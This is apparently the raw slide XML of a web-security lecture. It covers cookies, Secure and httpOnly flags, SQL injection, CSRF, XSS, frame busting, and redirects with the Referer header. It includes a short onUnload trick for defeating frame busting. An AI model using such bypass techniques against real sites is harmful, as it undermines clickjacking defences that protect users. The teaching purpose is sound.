            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1098" y="3504"/>
              <a:ext cx="1440" cy="44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If YES,  </a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>      restricted.html</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1323048" name="Text Box 40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7661275" y="4876800"/>
            <a:ext cx="12541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Check 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4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 Security Policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137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5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses: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Personalization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User tracking:   e.g.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Doubleclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   (3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> party cookies)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser will store:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At most  20 cookies/site,     3 KB / cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Origin is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tuple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;domain, path&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can set cookies valid across a domain suffix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533400" y="1524000"/>
            <a:ext cx="114300" cy="21336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 smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill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Three top web site vulnerabilites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1126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Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser sends malicious input to server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad input checking leads to malicious SQL query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSRF – Cross-site request forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad web site sends request to good web site, using credentials of an innocent victim who “visits” site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS – Cross-site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad web site sends innocent victim a script that steals information from an honest web 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4648200"/>
            <a:ext cx="3962400" cy="708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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inject malicious script into trusted context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3330575"/>
            <a:ext cx="3962400" cy="708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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Leverage user’s session at </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>victim sever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2035175"/>
            <a:ext cx="3962400" cy="708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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Uses SQL to change meaning of database command</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3802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/>
              <a:t>Secure Cookies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1423364" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="16922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65" name="AutoShape 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1547813" y="1792288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423366" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="25304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67" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="27590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68" name="Freeform 8"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2190750" y="2525713"/>
            <a:ext cx="400050" cy="38576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23369" name="AutoShape 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="16160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423370" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="20732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23371" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3705225" y="1600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GET …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1423372" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="23018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23373" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="2362200"/>
            <a:ext cx="4800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Secure=true</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1423374" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="3765550"/>
            <a:ext cx="7772400" cy="257492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 Provides confidentiality against network attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>  Browser will only send cookie back over HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="80000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>  … but no integrity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF00FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>  Can rewrite secure cookies over HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Symbol" pitchFamily="18" charset="2"/>
              <a:buChar char="Þ"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t> network attacker can rewrite secure cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Symbol" pitchFamily="18" charset="2"/>
              <a:buChar char="Þ"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t> can log user into attacker’s account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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="990600"/>
            <a:ext cx="2157413" cy="53340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/>
              <a:t>httpOnly Cookies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345541" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="16922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42" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1547813" y="1792288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Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345543" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="25304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44" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="27590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545" name="Freeform 9"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2190750" y="2525713"/>
            <a:ext cx="400050" cy="385762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45546" name="AutoShape 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="16160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rgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345547" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="20732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45548" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3705225" y="1600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solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GET …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345549" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="23018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45550" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="2362200"/>
            <a:ext cx="4800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371600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	httpOnly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345565" name="Text Box 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="3898900"/>
            <a:ext cx="8022453" cy="252992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 Cookie sent over HTTP(s),  but not accessible to scripts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en-US" sz="2400" dirty="0"/>
              <a:t>  cannot be read via  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>  Helps prevent cookie theft via XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> …  but does not stop most other risks of XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>bugs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and frame busting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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="2164140"/>
            <a:ext cx="7010400" cy="15696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algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="med"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 smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> name=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>myframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>”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      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=“http://www.google.com/”&gt;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	       This text is ignored by most browsers.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&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&gt;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Frames</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146739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1000" cy="1791260"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Embed HTML documents in other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67397" name="Object 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4038600" y="4106139"/>
          <a:ext cx="4343400" cy="2193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Image" r:id="rId3" imgW="3873016" imgH="1955556" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Image" r:id="rId3" imgW="3873016" imgH="195555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06139"/>
                        <a:ext cx="4343400" cy="2193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8418" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect l="7031" t="31662" r="77435" b="47917"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="3081338"/>
            <a:ext cx="243840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6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Busting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146842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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Goal:  prevent web page from loading in a frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>example: opening login page in a frame will display</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>correct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>passmark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> image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Frame busting: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68421" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="4724826"/>
            <a:ext cx="5427255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dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>if   (top != self)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top.location.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>location.href</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="240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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Frame Busting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1469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Problem:    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OnUnload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> event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 smtClean="0"/>
              <a:t>Try this instead:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1469444" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="958366" y="2817168"/>
            <a:ext cx="7119321" cy="4616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 smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&lt;body </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>onUnload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>cause_an_abort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>;)"&gt; </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1469445" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="4410943"/>
            <a:ext cx="5427255" cy="131112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dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>if   (top != self)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/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top.location.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>location.href</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>else {  …  code of page here …}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Redirects </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1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Sites can redirect browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="110595" name="Picture 2" descr="Redirecting Incoming Http Requests"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect t="14000"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="895350" y="1828800"/>
            <a:ext cx="67246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6" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3638550" y="1676400"/>
            <a:ext cx="25146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110597" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096000" y="3429000"/>
            <a:ext cx="609600" cy="3048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110598" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="742950" y="3886200"/>
            <a:ext cx="1981200" cy="3048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3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Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>(sic) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="112643" name="Picture 2" descr="Redirecting Incoming Http Requests"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect t="14000"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="895350" y="1828800"/>
            <a:ext cx="67246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4" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3638550" y="1676400"/>
            <a:ext cx="25146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112645" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096000" y="3429000"/>
            <a:ext cx="609600" cy="3048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112646" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="742950" y="3886200"/>
